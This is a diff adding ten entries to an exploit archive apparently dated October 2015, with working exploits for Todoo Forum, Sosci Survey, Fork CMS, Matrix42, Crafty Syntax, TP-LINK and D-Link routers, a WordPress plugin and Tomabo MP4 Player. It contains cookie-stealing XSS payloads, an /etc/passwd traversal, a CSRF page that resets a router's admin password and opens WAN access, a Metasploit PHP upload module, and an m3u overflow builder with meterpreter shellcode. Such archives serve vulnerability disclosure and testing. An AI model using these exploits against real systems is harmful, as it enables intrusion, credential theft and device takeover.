DB: 2015-10-19

10 new exploits

files.csv

@@ -34736,6 +34736,8 @@ id,file,description,date,author,platform,type,port
 38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
 38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
+38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 todooforum.php Multiple Parameter XSS",2013-04-14,"Chiekh Bouchenafa",php,webapps,0
+38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0
 38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
 38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
@@ -34752,3 +34754,11 @@ id,file,description,date,author,platform,type,port
 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
 38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
+38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0
+38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross Site Scripting Vulnerability",2013-03-06,43zsec,asp,webapps,0
+38480,platforms/php/webapps/38480.txt,"Fork CMS 'file' Parameter Local File Include Vulnerability",2013-04-18,"Rafay Baloch",php,webapps,0
+38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross Site Request Forgery Vulnerability",2013-04-19,"Jacob Holcomb",hardware,remote,0
+38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0
+38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
+38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
+38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0

platforms/asp/webapps/38479.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/59290/info
+
+Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Service Store 5.3 SP3 (5.33.946.0) is vulnerable; other versions may also be affected. 
+
+https://www.example.com/SPS/Portal/default.aspx?'"--></style></script> 
+<script>alert(document.cookie)</script> [XSS]

platforms/hardware/dos/38483.txt

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/59325/info
+
+TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
+
+Successful exploits will cause the device to crash, denying service to legitimate users. 
+
+GET http://www.example.com:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
+Host: www.example.com
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/userRpm/DdnsAddRpm.htm?provider=4
+Authorization: Basic YWRtaW46YWRtaW4=
+
+
+
+GET http://www.example.com:80/help/../../root HTTP/1.1
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/help/

platforms/hardware/remote/38481.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/59312/info
+
+D-Link DIR-865L is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
+
+D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected. 
+
+<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html> 

platforms/php/webapps/38476.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/59069/info
+
+Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Todoo Forum 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
+http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script> 

platforms/php/webapps/38477.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/59069/info
+ 
+Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Todoo Forum 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
+http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
+ 

platforms/php/webapps/38478.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/59278/info
+
+Sosci Survey is prone to following security vulnerabilities:
+
+1. An unauthorized-access vulnerability
+2. Multiple cross-site scripting vulnerabilities
+3. Multiple HTML-injection vulnerabilities
+4. A PHP code-execution vulnerability
+
+Successful exploits may allow an attacker to gain unauthorized access to the affected application, allow attacker-supplied HTML and script code to run in the context of the affected browser, allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or inject and execute arbitrary malicious PHP code in the context of the web server process. 
+
+https://www.example.com/admin/index.php?o=account&a=message.reply&id=[msg_id]
+https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script> 

platforms/php/webapps/38480.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59298/info
+
+Fork CMS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 
+
+http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371 

platforms/php/webapps/38482.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/59322/info
+
+Crafty Syntax Live Help is prone to a remote file-include vulnerability and a path-disclosure vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to obtain sensitive information and compromise the application and the underlying system; other attacks are also possible.
+
+Crafty Syntax Live Help versions 2.x and versions 3.x are vulnerable. 
+
+File-include:
+
+http://www.example.com/path/admin.php?page=[RFI]
+
+Path-disclosure:
+
+http://www.example.com/livehelp/xmlhttp.php
+
+

platforms/php/webapps/38484.rb

@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+  
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
+      'Description'     => %q{
+          This module exploits an authenticated file upload vulnerability in Wordpress plugin
+ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
+          Tested with version v2.7.3. (May work on older versions).
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
+        ],
+      'References'      =>
+        [
+          ['WPVDB', '8209']
+        ],
+      'DisclosureDate'  => 'Oct 02 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['ajax-load-more', {}]],
+      'DefaultTarget'   => 0
+    ))
+	
+	register_options(
+    [
+         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
+         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
+    ], self.class)
+  end
+  
+  def user
+    datastore['WP_USER']
+  end
+  
+  def password
+    datastore['WP_PASSWORD']
+  end
+  
+  def check
+    # Check plugin version
+	ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
+	if ver
+	  return Exploit::CheckCode::Appears
+	end
+	return Exploit::CheckCode::Safe
+  end
+  
+  def exploit
+    # Wordpress login
+    print_status("#{peer} - Trying to login as #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as #{user}")
+      return
+    end
+    
+    url = normalize_uri(wordpress_url_backend, 'profile.php')
+    print_status("#{peer} - Retrieving WP nonce from #{url}")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => url,
+      'cookie'   => cookie
+    })
+    
+    if res and res.code == 200
+      # "alm_admin_nonce":"e58b6d536d"
+      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
+      wp_nonce = $1
+      if wp_nonce
+        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
+      else
+        vprint_error("#{peer} #{res.body}")
+        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
+      end
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
+    end
+
+    print_status("#{peer} - Trying to upload payload")
+    
+    # Generate MIME message
+    data = Rex::MIME::Message.new
+    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
+    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
+    data.add_part('default', nil, nil, 'form-data; name="type"')
+    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
+    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_admin_ajax),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s,
+      'cookie'   => cookie
+    })
+    
+    filename = 'default.php'
+    if res
+      if res.code == 200
+        lines = res.body.split("\n")
+        if lines.length > 0
+          message = lines[lines.length - 1]
+          if message.include?('Template Saved Successfully')
+            register_files_for_cleanup(filename)
+          else
+            vprint_error("#{peer} - Unexpected web page content : #{message}")
+          end
+        else
+          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
+        end
+      else
+        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+    
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
+    )
+  end
+end

platforms/windows/local/38486.py

@@ -0,0 +1,53 @@
+#!/usr/bin/python
+
+#####################################################################
+# Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow  #
+# Exploit Author: @yokoacc, @nudragn, @rungga_reksya                #
+# Vendor Homepage: http://www.tomabo.com/                           #
+# Software Link: http://www.tomabo.com/mp4-player/download.html     #
+# Vulnerable App: Attached                                          #
+# Version: 3.11.6 (possibility <= 3.11.6)                           #
+# Tested on: Windows XP, 7, 8, and 8.1                              #
+# Special Thanks to: @OffsecTraining                                #
+# Vendor Notification: August 30th, 2015                            #
+# Fixed Date: Around September 16th, 2015 (didn't response yet)     #
+# Public Disclosure: October 18th, 2015                             #
+#####################################################################
+
+# How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo
+# Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20'
+# Payload= windows/meterpreter/bind_tcp ; PORT=4444
+
+file ="whatever.m3u"
+
+load = "\x41" * 1028
+load += "\xeb\x08\x90\x90"
+load += "\xA9\x1C\x40\x00"
+load += "\x90" * 16
+load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
+"\x48\x31\x6f\x18\x03\x6f\x18\x83\xef\x40\x7c\x6d\x24\x50\x03"
+"\x8e\xd5\xa0\x64\x06\x30\x91\xa4\x7c\x30\x81\x14\xf6\x14\x2d"
+"\xde\x5a\x8d\xa6\x92\x72\xa2\x0f\x18\xa5\x8d\x90\x31\x95\x8c"
+"\x12\x48\xca\x6e\x2b\x83\x1f\x6e\x6c\xfe\xd2\x22\x25\x74\x40"
+"\xd3\x42\xc0\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe"
+"\xca\x92\xa0\xca\x42\x8d\xa5\xf7\x1d\x26\x1d\x83\x9f\xee\x6c"
+"\x6c\x33\xcf\x41\x9f\x4d\x17\x65\x40\x38\x61\x96\xfd\x3b\xb6"
+"\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b"
+"\x05\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7"
+"\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xa1\x21"
+"\xa0\x8f\x59\xb1\xae\x98\x2a\x83\x71\x33\xa5\xaf\xfa\x9d\x32"
+"\xd0\xd0\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80"
+"\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc"
+"\xeb\x6a\xfc\xee\x21\x03\x94\x12\xca\x3d\x38\x9a\x2c\x57\xd0"
+"\xca\xe7\xc0\x12\x29\x30\x76\x6d\x1b\x68\x10\x26\x4d\xaf\x1f"
+"\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2"
+"\x8d\x43\x63\xff\x64\x83\xf1\x04\x2f\xd4\x6d\x07\x16\x12\x32"
+"\xf8\x7d\x29\xfb\x6c\x3e\x45\x04\x61\xbe\x95\x52\xeb\xbe\xfd"
+"\x02\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf0\x66\x4a\x0e\xfe"
+"\x51\xbc\x91\x01\xb4\x3c\xed\xd7\xf0\x4a\x1f\xe4")
+
+load += "\x44" * (1800 - len(load))
+
+writeFile = open (file, "w")
+writeFile.write(load)
+writeFile.close()